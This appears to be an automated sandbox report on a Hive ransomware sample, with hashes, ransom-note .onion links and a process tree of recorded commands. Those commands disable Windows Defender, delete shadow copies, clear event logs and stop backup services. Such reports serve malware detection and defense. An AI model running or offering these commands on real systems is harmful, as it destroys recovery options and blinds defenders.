Analysis
- max time kernel: 126s
- max time network: 127s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 12-01-2022 15:00

Static task: static1
Behavioral task: behavioral1
- Sample: 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe
- Resource: win10-en-20211208
General
- Target: 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe
- Size: 3.6MB
- MD5: 5f37c1a687d21c5f722e5f08f63bebf2
- SHA1: 921e722e010997e21d8b89cf3fec2953375f0f36
- SHA256: 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1
- SHA512: 817f908a9503a055ae867664bb7f58056c224a3772c51ea0abf343cf9adaa2b0355b13ebbb185f38d45a91e31b95e9b0ca2774efc84db1fbef394051e351d9b4
Malware Config
Extracted from: C:\agQX_HOW_TO_DECRYPT.txt
Family: hive
- http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
- http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses mpcmdrun utility to delete all AV definitions.
Processes:
- MpCmdRun.exe (PID 2084)
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service (2 TTPs, 1 IoC)
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
-
Clears Windows event logs (1 TTP)
-
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory (64 IoCs)
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- vssadmin.exe (PID 1480)
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
- powershell.exe (PID 2116)
- powershell.exe (PID 2192)
- 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe (PID 1600)
-
Suspicious use of AdjustPrivilegeToken (64 IoCs)
-
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
-
Depth in the process tree is shown in brackets; the indented line under each image path is the command line as recorded.

[1] C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe (PID 1600)
    "C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\net.exe (PID 520)
      net.exe stop "NetMsmqActivator" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 560)
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 1736)
      net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 1480)
        C:\Windows\system32\net1 stop "SamSs" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 1344)
      net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 364)
        C:\Windows\system32\net1 stop "SDRSVC" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 1188)
      net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 1576)
        C:\Windows\system32\net1 stop "SstpSvc" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 1380)
      net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 624)
        C:\Windows\system32\net1 stop "UI0Detect" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 1584)
      net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 1624)
        C:\Windows\system32\net1 stop "VSS" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 1124)
      net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 992)
        C:\Windows\system32\net1 stop "wbengine" /y
  [2] C:\Windows\SysWOW64\net.exe (PID 1588)
      net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe (PID 1448)
        C:\Windows\system32\net1 stop "WebClient" /y
  [2] C:\Windows\SysWOW64\sc.exe (PID 1672)
      sc.exe config "NetMsmqActivator" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 1952)
      sc.exe config "SamSs" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 688)
      sc.exe config "SDRSVC" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 728)
      sc.exe config "SstpSvc" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 1648)
      sc.exe config "UI0Detect" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 1752)
      sc.exe config "VSS" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 1664)
      sc.exe config "wbengine" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe (PID 1660)
      sc.exe config "WebClient" start= disabled
  [2] C:\Windows\SysWOW64\reg.exe (PID 596)
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1860)
      reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1824)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1136)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 304)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 2028)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1624)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1400)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1872)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1212)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 544)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1968)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1944)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1504)
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1152)
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 268)
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\schtasks.exe (PID 1724)
      schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe (PID 696)
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe (PID 1000)
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe (PID 1868)
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe (PID 988)
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  [2] C:\Windows\SysWOW64\reg.exe (PID 1708)
      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1960)
      reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1988)
      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1700)
      reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1580)
      reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 856)
      reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1044)
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 836)
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 1360)
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 932)
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe (PID 336)
      reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      - Modifies security service
  [2] C:\Windows\SysWOW64\reg.exe (PID 1696)
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\vssadmin.exe (PID 1480)
      vssadmin.exe delete shadows /all /quiet
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\wevtutil.exe (PID 1788)
      wevtutil.exe cl system
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\wevtutil.exe (PID 1796)
      wevtutil.exe cl security
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\wevtutil.exe (PID 892)
      wevtutil.exe cl application
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\Wbem\wmic.exe (PID 624)
      wmic.exe SHADOWCOPY /nointeractive
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\Wbem\wmic.exe (PID 920)
      wmic.exe shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\cmd.exe (PID 2060)
      cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    [3] C:\Program Files\Windows Defender\MpCmdRun.exe (PID 2084)
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        - Deletes Windows Defender Definitions
  [2] C:\Windows\SysWOW64\cmd.exe (PID 2096)
      cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2116)
        powershell Set-MpPreference -DisableIOAVProtection $true
        - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\SysWOW64\cmd.exe (PID 2172)
      cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2192)
        powershell Set-MpPreference -DisableRealtimeMonitoring $true
        - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
- MD5: b05da822fc672cfdb7dee30f2f87afd6
- SHA1: 2e0a89ebf40b8a0b593026d8eec01501e1588a29
- SHA256: fc37f4dc8be0b59d230abbde1141dbdc3d8f4de03796144d871435bdc14e54ce
- SHA512: 8359f7eed082fba1dc1d57167dab12dfaa225cc30073e99a31bd9c0fb267a12b0590ab3cf26b3d140e7f6ad8d190151c265b4a17d406e4766dc3031116ccff79